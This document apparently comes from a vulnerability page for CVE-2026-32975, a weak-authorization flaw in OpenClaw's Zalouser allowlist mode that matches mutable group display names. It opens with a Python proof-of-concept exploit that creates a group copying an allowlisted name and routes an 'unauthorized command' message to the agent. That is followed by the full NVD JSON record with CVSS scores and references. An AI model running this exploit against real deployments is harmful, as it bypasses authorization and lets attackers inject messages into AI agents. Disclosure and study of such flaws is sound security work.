CVE-2026-32975

#!/usr/bin/env python3 # Proof of Concept for CVE-2026-32975 # This script demonstrates how an attacker can bypass authorization # by creating a group with the same display name as an allowlisted group. import requests def exploit(target_url, allowlisted_group_name): # Step 1: Create a malicious group with the same display name create_group_url = f"{target_url}/api/groups" payload = { "display_name": allowlisted_group_name, # The vulnerable mutable field "description": "Malicious group created by attacker" } print(f"[*] Creating malicious group with name: {allowlisted_group_name}") response = requests.post(create_group_url, json=payload) if response.status_code == 201: malicious_group_id = response.json().get('id') print(f"[+] Malicious group created with ID: {malicious_group_id}") # Step 2: Send a message from the malicious group to the Agent send_msg_url = f"{target_url}/api/messages" message_payload = { "group_id": malicious_group_id, "content": "Unauthorized command execution via weak auth" } print(f"[*] Sending message from malicious group...") msg_response = requests.post(send_msg_url, json=message_payload) if msg_response.status_code == 200: print("[!] Exploit successful! Message routed to Agent despite authorization bypass.") else: print("[-] Failed to route message.") else: print("[-] Failed to create group.") if __name__ == "__main__": # Replace with actual target and discovered allowlist name TARGET = "http://openclaw-target:8080" ALLOWLISTED_NAME = "admin-ops" # Example discovered allowlisted name exploit(TARGET, ALLOWLISTED_NAME)

{"cve": {"id": "CVE-2026-32975", "sourceIdentifier": "[email protected]", "published": "2026-03-29T13:17:01.763", "lastModified": "2026-03-30T17:13:46.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.3.12 contains a weak authorization vulnerability in Zalouser allowlist mode that matches mutable group display names instead of stable group identifiers. Attackers can create groups with identical names to allowlisted groups to bypass channel authorization and route messages from unintended groups to the agent."}, {"lang": "es", "value": "OpenClaw anterior a 2026.3.12 contiene una vulnerabilidad de autorización débil en el modo de lista de permitidos de Zalouser que coincide con nombres de visualización de grupos mutables en lugar de identificadores de grupo estables. Los atacantes pueden crear grupos con nombres idénticos a los grupos en la lista de permitidos para eludir la autorización del canal y redirigir mensajes de grupos no deseados al agente."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-807"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.12", "matchCriteriaId": "B90EC1D8-4E2B-46AF-8E66-B689693A16CE"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f5mf-3r52-r83w", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-weak-authorization-via-mutable-group-names-in-zalouser-allowlist", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}